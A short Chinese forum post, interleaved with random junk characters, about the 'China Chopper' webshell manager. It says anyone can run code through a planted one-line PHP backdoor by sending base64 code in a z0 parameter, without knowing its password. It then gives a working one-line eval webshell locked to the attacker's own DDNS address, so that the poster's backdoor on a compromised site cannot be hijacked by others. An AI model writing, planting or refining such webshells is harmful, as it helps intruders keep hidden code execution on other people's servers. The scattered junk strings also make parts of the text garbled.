今天试了下“中国菜刀”这款C/S的WEB管理软件,发现一个致命的漏洞
- H2 f2 a* B0 _$ e8 C* J3 ?# V4 k, _* P% A; S
就算你设置了密码,使用了eval($_REQUEST['moyo']);
7 Z+ I; A* l$ o6 e Z+ U& v/ e/ S, {6 ]; n5 `
但是别人还是可以在不知道连接密码是moyo的情况下直接使用你的一句话后门- d0 a" f4 G& s7 H
7 N. H* |; q9 s% q; H9 T
因为$_REQUEST['moyo']传递的内容是@eval(base64_decode($_POST[z0]));
) S; a2 H7 }/ E; }0 v* R
7 E/ G, [4 l2 e直接访问 /backdoor.php?z0={BASE64加密后的代码} 就可以执行代码了
7 a) h0 N, v3 w! Y8 _
, m! |. c B2 s# C1 ^! C不知道是设计缺陷还是故意留的后门/ N3 B3 {; D1 |! m5 \/ A
" @8 Z& E d% K2 E
如果有人使用一句话之类的密码,有个小技巧可以避免自己的一句话被人盗用
7 z5 @. E+ J% X# [1 d( \7 k( i) j$ M/ a0 S+ z
本地使用花生壳之类的DDNS软件,比如分配域名是moyo.apiz.org
8 O9 ~, Q6 Z% X! E8 ?& g# F. ]4 B! d7 f0 p" ~5 j: N: Y0 C
然后一句话后门这样写
' @) u o( H& V' p$ L- ^+ f) Y* t- {: A/ w0 @( I, r
<?php $_SERVER['REMOTE_ADDR'] == gethostbyname('moyo.apiz.org') ? @eval($_REQUEST['moyo']) : exit('DENIED') ?>- S. a4 T3 g/ A
这样就可以让一句话后门只允许自己的电脑连接了
( X2 A* C) d6 b( u/ {. \/ h
% W" Q3 @. ]& ]9 H( ?8 g- R" ?6 f, m |